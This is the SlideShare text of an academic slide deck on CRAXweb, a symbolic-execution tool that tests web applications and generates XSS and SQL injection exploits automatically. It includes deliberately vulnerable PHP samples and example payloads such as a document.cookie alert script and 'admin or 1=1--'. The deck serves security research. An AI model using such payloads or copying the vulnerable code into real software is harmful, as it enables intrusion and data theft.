SlideShare a Scribd company logo

CRAXweb: Automatic web application testing and attack generation

Shih-Kun Huang
Shih-Kun Huang

This paper proposes to test web applications and generate the feasible exploits directly and automatically, including cross-site scripting and SQL injection attacks. Our target is to generate the attack string and reproduce the results, emulating the manual attack behavior. In contrast with other traditional detection and prevention methods, we can certainly determine the presence of vulnerabilities and prove the feasibility of attacks. This automatic generation process is mainly based on a dynamic software testing method-symbolic execution by S2E. We have applied this automatic process to several known vulnerabilities on large-scale open source web applications, and generated the attack strings successfully. Our method is web platform independent, covering PHP, JSP, Rails, and Django.

EducationTechnology
1 of 58
Download to read offline
CRAXweb: Web Testing and Attacks through “QEMU” in S2E Shih-Kun Huang National Chiao Tung University Hsinchu, Taiwan skhuang@cs.nctu.edu.tw
Motivation • Symbolic Execution is effective to crash applications – Catchconv, Bitfuzz, Taintscope, and Ardilla (PHP) – Should be effective for Web Testing • Symbolic Execution can also automate exploit generation process – AEG, MAYHEM, CRAX – Should be feasible to automate Web Attack (exploit) generation
How Effective of Automatic Exploit Generation for non-web applications • Mplayer (1.5MLOC) (CVE-2008-0630) – MPlayer 1.0rc2 and SVN before r25823 – 3.6 seconds • Microsoft Office Word (CVE-2012-0158) – Microsoft Office < 2010 – 216 seconds • Nginx (CVE-2013-2028) – nginx 1.3.9/1.4.0 stack buffer overflow – 8 seconds
Problems of Symbolic Web Testing and Attacks • Hard to Implement Symbolic Execution Platform for Web – MIT’s Ardilla not in public and only for PHP – Various number of Web platforms: PHP, JSP, Python, Perl, Ruby, ASP • Variety of Attack Methods – Non-web attacks: stack, heap, format, integer, uninitialized uses, race,… – OWASP top attacks: injection, XSS, CSRF,…
Web Platform Independent Testing • (PHP,JSP,ASP,NodeJS,Python,Ruby,…) symbolic execution engine ? – QEMU–based symbolic execution engine -> S2E • Issues – Performance should be the primary consideration – Will symbolic semantics be preserved ? Across between Web semantics and llvm semantics.
Attack Independent Exploit Generation • Taint Analysis – Input tainted operations • Symbolic Continuations (what to do next ?) – Symbolic program counter (Symbolic EIP) • Where the EIP points to – Symbolic SQL query • Where the SQL commands run – Symbolic HTML response • Where the Javascript executes – Symbolic command argument • Where the shell commands run
The power of Symbolic Computation • Symbolic Execution – Generating Testing input, following all feasible branches • Concolic Execution – Generating Testing input, following a concrete input path and the associated branches • Exploit Generation – Generating Exploit input, following a concrete Crash/Anomaly input path and branch to the associated “shell code” – Path Constraint generated by the crash input – Constraints of Symbolic “continuations” branching to the shell code
Symbolic Execution • Explore every possible path of a program – Record path information in path constraint Path constraint 1 Symbolic input A program Path constraint 2 Path constraint 3 2014/2/11 Liu Huan 劉歡 A Generic Web Testing and Attack Generation Framework 8
Concolic Execution • Begin with a random input • Use false path constraint to generate another input case Output1 Input 1 Path constraint 1 Input 2 A program Output2 Path constraint 2 Output3 Input 3 Path constraint 3 …… 2014/2/11 Liu Huan 劉歡 A Generic Web Testing and Attack Generation Framework …… 9
Exploit Generation • Record the path constraint of the given crash input Crash Input: x A program Output: y Path constraint 2014/2/11 Liu Huan 劉歡 A Generic Web Testing and Attack Generation Framework 10
Constraint Solving Unknown input: x A program Output: y Path constraint • Given program output y, constraint solving is the way to generate input x Output: y + Solve constraint Value of input x Path constraint 11
Constraint Solving • If f(x) = 100, what’s the value of x? Known output =100 Unknown input: x Sample code 1 int f(x){ 2 int y=x+10; 3 if (y >0) 4 return y; 5 else 6 return y; 7 } 12
Constraint Solving • If f(x) = 100, what’s the value of x? – Use symbolic execution to get path constraint Sample code PC of path 1 Path constraint PC of path 2 X+10 > 0 X+10 <= 0 1 int f(x){ 2 int y=x+10; 3 if (y >0) 4 return y; 5 else 6 return y; 7 } 13
Constraint Solving • If f(x) = 100, what’s the value of x? – Use symbolic execution to get path constraint – ∵ f(x) = y = X+10 = 100 Known output =100 ∴ Add path constraint X + 10 = 100 Sample code PC of path 1 PC of path 2 Path constraint X+10 > 0 X+10 <= 0 Add constraint from known information X+10 = 100 X + 10 = 100 1 int f(x){ 2 int y=x+10; 3 if (y >0) 4 return y; 5 else 6 return y; 7 } 14
Constraint Solving • If f(x) = 100, what’s the value of x? – Use symbolic execution to get path constraint – ∵ f(x) = y = X+10 = 100 Known output =100 ∴ Add path constraint X + 10 = 100 – Solve the constraint • x = 90 Sample code input: x=90 PC of path 1 PC of path 2 Path constraint X+10 > 0 X+10 <= 0 Add constraint from known information X+10 = 100 X + 10 = 100 Constraint solving X = 90 No solution 1 int f(x){ 2 int y=x+10; 3 if (y >0) 4 return y; 5 else 6 return y; 7 } 15
Constraint Solving • What’s the XSS exploit of the given sample code? Sample code 1 <?php 2 $input = $_GET['id']; 3 for($i=0; $i<strlen($input); $i++) 4 echo chr(ord($input[$i])+1); 5 ?> 16
Constraint Solving • What’s the XSS exploit of the given sample code? – Symbolic request & response HTTP Request Unknown input (XSS attack) GET /index.php?id=[ input ] HTTP/1.1 Host: example.com HTTP Response Known output (an alert script) HTTP/1.1 200 OK Context-type: text/html Sample code <html> some text [ output ] </html> 1 <?php 2 $input = $_GET['id']; 3 for($i=0; $i<strlen($input); $i++) 4 echo chr(ord($input[$i])+1); 5 ?> 17
Constraint Solving • What’s the XSS exploit of the given sample code? – Symbolic request & response – Add JavaScript code as target character • output = <script>alert(document.cookie)</script> HTTP Response ;rbqhos=… HTTP Request GET /index.php?id=[ input ] HTTP/1.1 Host: example.com Sample code <script>… 1 <?php 2 $input = $_GET['id']; 3 for($i=0; $i<strlen($input); $i++) <html> some text [ output ] 4 echo chr(ord($input[$i])+1); </html> 5 ?> HTTP/1.1 200 OK Context-type: text/html 18
Constraint Solving • What’s the XSS exploit of given sample code? – Symbolic request & response – Add JavaScript code as target character • output = <script>alert(document.cookie)</script> – Solve the constraint • input = ;rbqhos=`kds’cnbtldms-bnnjhd(;,rbqhos= HTTP Response ;rbqhos=… HTTP Request GET /index.php?id=[ input ] HTTP/1.1 Host: example.com Sample code <script>… 1 <?php 2 $input = $_GET['id']; 3 for($i=0; $i<strlen($input); $i++) <html> some text [ output ] 4 echo chr(ord($input[$i])+1); </html> 5 ?> HTTP/1.1 200 OK Context-type: text/html 19
Path Constraints Input Path constraint Target output Solved output input[0] chr(input[0]+1) < ; input[1] chr(input[1]+1) s r input[2] chr(input[2]+1) c b input[3] chr(input[3]+1) r q input[4] chr(input[4]+1) i h input[5] chr(input[5]+1) p o input[6] chr(input[6]+1) t s input[7] chr(input[7]+1) > = input[8] chr(input[8]+1) a ` input[9] chr(input[9]+1) l k … … … … 20
Exploit Generation of Single URL • This method can check security risk of a single URL HTTP Response HTTP/1.1 200 OK Context-type: text/html <script>alert(document.cookie)</script> <html> some text [ output ] </html> mysql_query admin or 1=1-- SELECT * FROM user WHERE user=[symbolic] 21
Exploit Generation • Generate exploit of a web application 22
Single Path Concolic Execution • In order to reduce the overhead on symbolic execution HTTP Request HTTP Request GET index.php?abc=[ Host: 123.123.123.123 ] HTTP/1.1 Symbolic execution: Explore all possible paths GET index.php?abc=[AAAAA] HTTP/1.1 Host: 123.123.123.123 Single path concolic execution: Only explore the path of the given input 23
Restriction 24
Outline • Introduction • Background • Method – Exploit Generation – System Architecture • Related Work • Evaluation • Conclusion and Future Work 25
System Architecture • • • • Symbolic Environment on S2E CRAXWeb Architecture CRAX Framework Detail of CRAXWeb – Web Crawler – Symbolic Request Sender – Symbolic Data Sensor – Exploit Generator 26
S2E (Selective Symbolic Execution) Symbolic data sender Exploit generator 27
S2E (Selective Symbolic Execution) Symbolic data sender For XSS attack Symbolic data sensor Exploit generator 28
S2E (Selective Symbolic Execution) Symbolic data sensor Symbolic data sender For SQL injection attack Exploit generator 29
CRAXWeb Architecture Test unit S2E QEMU (server) Web application Symbolic data sensor s2e_myop Sym. socket Web crawler Symbolic Sym. request Socket Web Server sender Expolit generator Report Sym. Socket Symbolic data sensor s2e_myop STP Solver (client) 30
CRAX Framework 31
Web Crawler Test unit S2E QEMU (server) Web application Symbolic data sensor s2e_myop Sym. socket Web Web crawler crawler Symbolic Sym. request Socket Web Server sender Expolit generator Report Sym. Socket Symbolic data sensor s2e_myop STP Solver (client) 32
Web Crawler (Burp Suite) Web application GET index.php?abc=xxxxx HTTP/1.1 Host: example.com Web crawler Database POST index.php HTTP/1.1 Host: example.com Content-length: 40 a=xxxx&b=xxx 33
Symbolic Request Sender Test unit S2E QEMU (server) Web application Symbolic data sensor s2e_myop Sym. socket Web crawler Symbolic Symbolic request request sender sender Expolit generator Sym. Web Server Socket Report Sym. Socket Symbolic data sensor s2e_myop STP Solver (client) 34
Symbolic Data Sender Web crawler Database 1. Experiment request Control node Symbolic data sender 2. Experiment response Web application 2014/2/11 35
Symbolic Data Sensor Test unit S2E QEMU (server) Web application Symbolic Symbolic data data sensor sensor s2e_myop Sym. socket Web crawler Symbolic Sym. request Socket Web Server sender Expolit generator Report Sym. Socket Symbolic Symbolic data data sensor sensor s2e_myop STP Solver (client) 36
Symbolic Data Sensor Sensitive data Symbolic data sensor Exploit generator If it is a symbolic data, The sensor can call exploit generator Web security issues XSS SQL injection … 2014/2/11 Sensor location HTTP Response mysql_query() … 37
Other Web Security issues Sensor location PHP Python Remote file Inclusion Directory traversal Command injection Code Injection File upload include(), include_once() … fopen(), file() … include(), require()… open()… system(), file()… system(), exec()… eval()… move_uploaded_file(), rename(), … eval()… open()… 38
Exploit Generator Test unit S2E QEMU (server) Web application Symbolic data sensor s2e_myop Sym. socket Web crawler Symbolic Sym. request Socket Web Server sender Exploit Expolit generator generator Report Sym. Socket Symbolic data sensor s2e_myop STP Solver (client) 39
Exploit Generator 2014/2/11 40
Exploit Generator SELECT * FROM user WHERE user=[symbolic] …… symbolic Sample code 1 <?php 2 $input = base64_decode($_GET[‘user']); 3 mysql_query(“SELECT * FROM user 4 WHERE user=”. $input); 5 ?> ... x.php?user=YWRtaW4gb3Ig... 41
Outline • • • • • • Introduction Background Method Related Work Evaluation Conclusion and Future Work 42
Front End Interface 43
Front End Interface 44
Experiment Monitor CRAX Web Guest QEMU 45
Generated Exploit 46
Exploit Validation 47
Exploit Validation 48
Evaluation for Web platform independence Test case ~= echo(“A”x50) OT >= 12hr PHP JSP Rails Django ASP Framework - - 3.2 0.96.1 - OS Linux Linux Linux Linux Windows Server Apache-2.2.19 Tomcat-7.0.2 Webrick Built-in IIS-5.1 Kernel PHP-5.3.6 JDK-7u2 Ruby-1.9.3 Python-2.6.6 ASP-3.0 Bind Port 80 8080 3000 8000 80 Symbolic response time 18.50s 6.72min 7.45min 32.72s OT Without constraints 16.42s 3.25min 5.62min 24.02s OT 49
Evaluation for XSS OT >= 15min Test Case Line Of Code # of crawled request # of XSS # of XSS (vulnerable) by MIT Time per exploit Time for all crawled request Schoolmate-1.5.4 8,125 452 19 14 0.30min 107.78min + 30OT Webchess-1.0.0rc2 6,504 410 5(4) 13 0.80min 94.38min + 313OT Faqforge-1.3.2 1,710 28 4 4 0.20min 5.74 min EVE 904 12 2 2 0.42min 4.94min Test Case Line Of Code Platform # of crawled request # of XSS (vulnerabl e) Time per exploit Time for all crawled request SimpGB-1.49.02 41,296 PHP 1,299 33(57) 0.91min 7.67hr + 334OT DedeCms-5.6 84,544 PHP 1,111 11(13) 0.48min 8.32hr + 9OT Django-admin-0.96.1 3,558 Python 5 1 5.29min 5.29min + 4OT Discuz!-6.0 67,088 PHP 613 0(1) 0.85min 8.37hr + 12OT Joomla-1.6 253,711 PHP 215 0(7) 2.17min 1.26hr + 117OT 50
Evaluation for SQL injection Test Case Schoolmate Webchess Faqforge 1.54 1.0.0rc2 EVE 1.3.2 Testlink phpreci- 1.8.4 piebook 2.24 Line of code 8125 6504 1710 904 144913 52631 CVE - - - - 2009- 2009- 4238 4883 # of crawled request 269 65 7 9 218 65 # of SQLi (vulnerable) 12 6 3 3 9 6 # of SQLi by MIT 6 12 1 2 - - Time per exploit 0.55 min 0.39 min 0.27 min 0.24 3.24min 4.89min 2.12 706.4min 315.2min min (30 TO) (32 TO) 934 18047 6322 min Time for all crawled 148.58 min 25.15 min 1.88min requests # of all solved constraints 952 15254 1104 TO: Timeout 51
Outline • • • • • • Introduction Background Method Related Work Evaluation Conclusion and Future Work 52
Automatic Web Attack Generator • Based on symbolic execution – White box – Only support specific language • Based on reply value of server – Black box – Hard to handle encrypted data 53
Related Work Approach year Attacks/ Detectd Generation Algorithm W/B Box WB Plateform SAFELI 2008 SQLI Attack Statically inspect bytecode of application Apollo 2008 WB PHP WB PHP 2010 Malformed HTML Use Concolic execution to find bugs in PHP Detect web applications XSS, SQLI Attack It combines concrete and symbolic execution to covers paths XSS, SQLI Attack Attack gramma and symbolic execution Adrilla 2009 Kudzu WB JavaScript PIUIVT 2010 XSS, SQLI Attack Perturbation based Algorithm WB Java MySQLInject or NKSI Scan 2011 SQLIJ Attack BB PHP 2012 SQLIJ Attack BB JSP, ASP CRAX Web 2012 XSS, SQLI Attack Blind SQL Injection based on True/False, Order by Modulize SQL Injection patten to generate attack string Single path symbolic execution WB XSS: All, SQLI: PHP JAVA 54
Related Work Approach Year Attacks / Detectd SAFELI Apollo 2008 2008 Adrilla 2009 SQLI Attack Malformed HTML Detect XSS, SQLI Attack Kudzu PIUIVT MySQLInjector NKSI Scan 2010 2010 2011 2012 CRAX Web 2012 W / B Plateform Box W JAVA W PHP W PHP XSS, SQLI Attack XSS, SQLI Attack SQLI Attack SQLI Attack W W B B JavaScript JAVA PHP JSP, ASP XSS, SQLI Attack W XSS: All, SQLI: PHP 55
Conclusion • A framework to generate exploit of web application – Support XSS and SQL injection Web application CRAX Web Vulnerability Report • A successful trial of Symbolic Execution for Web by S2E 56
Future Work • Implement this structure on other kind of exploit generation Other Web Security issues Remote file Inclusion / Local File Inclusion Directory traversal Command injection Code Injection File upload 2014/2/11 Target Functions include(), include_once(), require(), requireonce()… fopen(), file(), unlink… system(), file()… eval()… move_uploaded_file(), rename(), … Liu Huan 劉歡 A Generic Web Testing and Attack Generation Framework 57
Open Doors to More Work • Symbolic Executions by S2E for – PHP, Python – JSP, Ruby – ASP, Perl – Node JS

Recommended

Zone IDA Proc
Zone IDA ProcZone IDA Proc
Zone IDA Proc
Tzung-Bi Shih
 
Csw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemesCsw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemes
CanSecWest
 
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Tzung-Bi Shih
 
Network security
Network securityNetwork security
Network security
babyangle
 
Cpp c++ 1
Cpp c++ 1Cpp c++ 1
Cpp c++ 1
Sltnalt Cosmology
 
C++ TUTORIAL 2
C++ TUTORIAL 2C++ TUTORIAL 2
C++ TUTORIAL 2
Farhan Ab Rahman
 
Computer networks and Information security 16SCN16
Computer networks and Information security 16SCN16Computer networks and Information security 16SCN16
Computer networks and Information security 16SCN16
Ayisha M Kalburgi
 
Clang tidy
Clang tidyClang tidy
Clang tidy
Yury Yafimachau
 

Recommended

Zone IDA Proc
Zone IDA ProcZone IDA Proc
Zone IDA Proc
Tzung-Bi Shih
 
Csw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemesCsw2016 gawlik bypassing_differentdefenseschemes
Csw2016 gawlik bypassing_differentdefenseschemes
CanSecWest
 
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Tzung-Bi Shih
 
Network security
Network securityNetwork security
Network security
babyangle
 
Cpp c++ 1
Cpp c++ 1Cpp c++ 1
Cpp c++ 1
Sltnalt Cosmology
 
C++ TUTORIAL 2
C++ TUTORIAL 2C++ TUTORIAL 2
C++ TUTORIAL 2
Farhan Ab Rahman
 
Computer networks and Information security 16SCN16
Computer networks and Information security 16SCN16Computer networks and Information security 16SCN16
Computer networks and Information security 16SCN16
Ayisha M Kalburgi
 
Clang tidy
Clang tidyClang tidy
Clang tidy
Yury Yafimachau
 
Symnet
SymnetSymnet
Symnet
Radu Stoenescu
 
Field Failure Reproduction Using Symbolic Execution and Genetic Programming
Field Failure Reproduction Using Symbolic Execution and Genetic ProgrammingField Failure Reproduction Using Symbolic Execution and Genetic Programming
Field Failure Reproduction Using Symbolic Execution and Genetic Programming
Alex Orso
 
Symbolic execution: The next chapter of the game
Symbolic execution: The next chapter of the gameSymbolic execution: The next chapter of the game
Symbolic execution: The next chapter of the game
Khoai Dũng
 
Symbolic Reasoning and Concrete Execution - Andrii Vozniuk
Symbolic Reasoning and Concrete Execution - Andrii Vozniuk Symbolic Reasoning and Concrete Execution - Andrii Vozniuk
Symbolic Reasoning and Concrete Execution - Andrii Vozniuk
Andrii Vozniuk
 
A Survey on Automatic Test Generation and Crash Reproduction
A Survey on Automatic Test Generation and Crash ReproductionA Survey on Automatic Test Generation and Crash Reproduction
A Survey on Automatic Test Generation and Crash Reproduction
Sung Kim
 
Symbolic Execution And KLEE
Symbolic Execution And KLEESymbolic Execution And KLEE
Symbolic Execution And KLEE
Shauvik Roy Choudhary, Ph.D.
 
Price of an Error
Price of an ErrorPrice of an Error
Price of an Error
Andrey Karpov
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
guest3379bd
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017
Manich Koomsusi
 
The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6
Wim Godden
 
Eclipse Con 2015: Codan - a C/C++ Code Analysis Framework for CDT
Eclipse Con 2015: Codan - a C/C++ Code Analysis Framework for CDTEclipse Con 2015: Codan - a C/C++ Code Analysis Framework for CDT
Eclipse Con 2015: Codan - a C/C++ Code Analysis Framework for CDT
Elena Laskavaia
 
Protocol T50: Five months later... So what?
Protocol T50: Five months later... So what?Protocol T50: Five months later... So what?
Protocol T50: Five months later... So what?
Nelson Brito
 
How to Connect SystemVerilog with Octave
How to Connect SystemVerilog with OctaveHow to Connect SystemVerilog with Octave
How to Connect SystemVerilog with Octave
Amiq Consulting
 
Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers
Mohammad Reza Kamalifard
 
Measuring maintainability; software metrics explained
Measuring maintainability; software metrics explainedMeasuring maintainability; software metrics explained
Measuring maintainability; software metrics explained
Dennis de Greef
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
Peter Sabev
 
CodeChecker summary 21062021
CodeChecker summary 21062021CodeChecker summary 21062021
CodeChecker summary 21062021
Olivera Milenkovic
 
Zenith Networks: Jump Start JUNOS
Zenith Networks: Jump Start JUNOSZenith Networks: Jump Start JUNOS
Zenith Networks: Jump Start JUNOS
Zenith Networks
 
Padding oracle [opkoko2011]
Padding oracle [opkoko2011]Padding oracle [opkoko2011]
Padding oracle [opkoko2011]
blaufish
 
A la découverte de TypeScript
A la découverte de TypeScriptA la découverte de TypeScript
A la découverte de TypeScript
Denis Voituron
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
Daniel Owens
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
Aj MaChInE
 

More Related Content

Viewers also liked

Field Failure Reproduction Using Symbolic Execution and Genetic Programming
Field Failure Reproduction Using Symbolic Execution and Genetic ProgrammingField Failure Reproduction Using Symbolic Execution and Genetic Programming
Field Failure Reproduction Using Symbolic Execution and Genetic Programming
Alex Orso
 

Viewers also liked (6)

Symnet
SymnetSymnet
Symnet
 
Field Failure Reproduction Using Symbolic Execution and Genetic Programming
Field Failure Reproduction Using Symbolic Execution and Genetic ProgrammingField Failure Reproduction Using Symbolic Execution and Genetic Programming
Field Failure Reproduction Using Symbolic Execution and Genetic Programming
 
Symbolic execution: The next chapter of the game
Symbolic execution: The next chapter of the gameSymbolic execution: The next chapter of the game
Symbolic execution: The next chapter of the game
 
Symbolic Reasoning and Concrete Execution - Andrii Vozniuk
Symbolic Reasoning and Concrete Execution - Andrii Vozniuk Symbolic Reasoning and Concrete Execution - Andrii Vozniuk
Symbolic Reasoning and Concrete Execution - Andrii Vozniuk
 
A Survey on Automatic Test Generation and Crash Reproduction
A Survey on Automatic Test Generation and Crash ReproductionA Survey on Automatic Test Generation and Crash Reproduction
A Survey on Automatic Test Generation and Crash Reproduction
 
Symbolic Execution And KLEE
Symbolic Execution And KLEESymbolic Execution And KLEE
Symbolic Execution And KLEE
 

Similar to CRAXweb: Automatic web application testing and attack generation

[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
Aj MaChInE
 
QA Fest 2019. Антон Молдован. Load testing which you always wanted
QA Fest 2019. Антон Молдован. Load testing which you always wantedQA Fest 2019. Антон Молдован. Load testing which you always wanted
QA Fest 2019. Антон Молдован. Load testing which you always wanted
QAFest
 

Similar to CRAXweb: Automatic web application testing and attack generation (20)

Price of an Error
Price of an ErrorPrice of an Error
Price of an Error
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017
 
The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6
 
Eclipse Con 2015: Codan - a C/C++ Code Analysis Framework for CDT
Eclipse Con 2015: Codan - a C/C++ Code Analysis Framework for CDTEclipse Con 2015: Codan - a C/C++ Code Analysis Framework for CDT
Eclipse Con 2015: Codan - a C/C++ Code Analysis Framework for CDT
 
Protocol T50: Five months later... So what?
Protocol T50: Five months later... So what?Protocol T50: Five months later... So what?
Protocol T50: Five months later... So what?
 
How to Connect SystemVerilog with Octave
How to Connect SystemVerilog with OctaveHow to Connect SystemVerilog with Octave
How to Connect SystemVerilog with Octave
 
Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers
 
Measuring maintainability; software metrics explained
Measuring maintainability; software metrics explainedMeasuring maintainability; software metrics explained
Measuring maintainability; software metrics explained
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
CodeChecker summary 21062021
CodeChecker summary 21062021CodeChecker summary 21062021
CodeChecker summary 21062021
 
Zenith Networks: Jump Start JUNOS
Zenith Networks: Jump Start JUNOSZenith Networks: Jump Start JUNOS
Zenith Networks: Jump Start JUNOS
 
Padding oracle [opkoko2011]
Padding oracle [opkoko2011]Padding oracle [opkoko2011]
Padding oracle [opkoko2011]
 
A la découverte de TypeScript
A la découverte de TypeScriptA la découverte de TypeScript
A la découverte de TypeScript
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portals
 
QA Fest 2019. Антон Молдован. Load testing which you always wanted
QA Fest 2019. Антон Молдован. Load testing which you always wantedQA Fest 2019. Антон Молдован. Load testing which you always wanted
QA Fest 2019. Антон Молдован. Load testing which you always wanted
 
Mining Source Code Improvement Patterns from Similar Code Review Works
Mining Source Code Improvement Patterns from Similar Code Review WorksMining Source Code Improvement Patterns from Similar Code Review Works
Mining Source Code Improvement Patterns from Similar Code Review Works
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 

Recently uploaded

9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service
discovermytutordmt
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
heathfieldcps1
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
QucHHunhnh
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
fonyou31
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Krashi Coaching
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
SoniaTolstoy
 

Recently uploaded (20)

9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdf
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across Sectors
 
fourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingfourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writing
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and Mode
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdf
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdf
 
Class 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfClass 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdf
 
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptxINDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
 
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
 
Z Score,T Score, Percential Rank and Box Plot Graph
